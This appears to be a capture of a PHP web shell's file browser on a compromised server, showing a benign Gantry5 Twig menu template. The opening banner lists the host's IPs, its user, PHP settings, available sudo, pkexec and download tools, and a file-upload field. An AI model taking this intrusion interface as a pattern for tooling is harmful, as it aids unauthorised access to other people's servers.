| Server IP : 172.67.191.97 / Your IP : 104.23.197.208 Web Server : Apache/2.4.63 (Ubuntu) System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 8.4.5 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/fcs/administrator/components/com_gantry5/templates/menu/ |
Upload File : |
<section
{%- if particle.css.id %} id="{{ particle.css.id }}"{% endif %} class="menu-selector-bar{%- if particle.css.class %} {{ particle.css.class }}{% endif %}" role="navigation">
<ul class="g-grid g-toplevel menu-selector" data-mm-id="" data-mm-base="" data-mm-base-level="1">
{% for child in item %}
{% set is_particle = child.type == 'particle' or child.type == 'module' %}
{% set active = (child.path|split('/')|first) == (path|split('/')|first) ? ' active' : '' %}
<li data-mm-id="{{ child.path }}"
data-mm-level="{{ child.level }}"
{% if is_particle %}
class="g-menu-removable g-menu-item-{{ child.type }}{{ active }}{% if child.options.particle.enabled == false %} g-menu-item-disabled{% endif %}"
data-mm-original-type="{{ child.type }}"
{% else %}
class="{{ active }}{% if child.enabled == false %} g-menu-item-disabled{% endif %}"
{% endif %}
>
{% include 'menu/item.html.twig' with {'item': child, 'target': 'columns' } %}
</li>
{% endfor %}
</ul>
<a class="global-menu-settings" href="{{ gantry.route('menu/edit', id) }}">
<i aria-label="{{ 'GANTRY5_PLATFORM_MENU_GLOBAL_SETTINGS'|trans }}" class="fa fa-cog" aria-hidden="true"></i>
</a>
</section>
<div class="column-container" data-g5-menu-columns="">
{% if columns %}
{% include 'menu/columns.html.twig' with {'item': columns } %}
{% endif %}
</div>